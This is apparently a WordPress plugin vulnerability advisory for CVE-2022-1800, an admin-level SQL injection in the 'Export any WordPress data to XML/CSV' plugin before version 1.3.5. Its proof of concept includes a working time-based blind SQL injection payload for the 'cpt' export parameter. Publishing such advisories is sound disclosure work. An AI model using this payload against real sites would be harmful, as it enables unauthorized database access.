Export any WordPress data to XML/CSV < 1.3.5 – Admin+ SQL Injection | CVE 2022-1800 | Plugin Vulnerabilities

Description

The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.

Proof of Concept

1. Go to the All Export > New Export screen in the WordPress admin.
2. Now click on Specific Post Type > Posts.
3. Click now on Migrate Posts and intercept this request and look for the name cpt:

Content-Disposition: form-data; name="cpt"
post

Change it to:

Content-Disposition: form-data; name="cpt"
post'+(select*from(select(sleep(10)))a)+'

Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.

Affects Plugins

Fixed in 1.3.5

References

CVE

URL

https://www.hackpertise.com/cve/37-cve-2022-1800/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Asif Nawaz Minhas

Submitter

Asif Nawaz Minhas

Verified

Yes

WPVDB ID

4267109c-0ca2-441d-889d-fb39c235f128

Timeline

Publicly Published

2022-05-20 (about 3 years ago)

Added

2022-05-20 (about 3 years ago)

Last Updated

2023-02-13 (about 2 years ago)

Other

Published

Title

Published

2025-07-24

Title

WooCommerce Point Of Sale (POS) <= 1.4 - Authenticated (Subscriber+) SQL Injection

Published

2025-03-06

Title

School Management System for Wordpress < 93.0.0 - Authenticated (Student+) SQL Injection via 'view-attendance'

Published

2022-04-25

Title

ARPrice Lite < 3.6.1 - Unauthenticated SQLi

Published

2017-10-03

Title

Relevanssi <= 3.6.0 - Authenticated Admin SQL Injection

Published

2024-03-25

Title

WooCommerce Customers Manager < 29.7 - Subscriber+ SQL Injection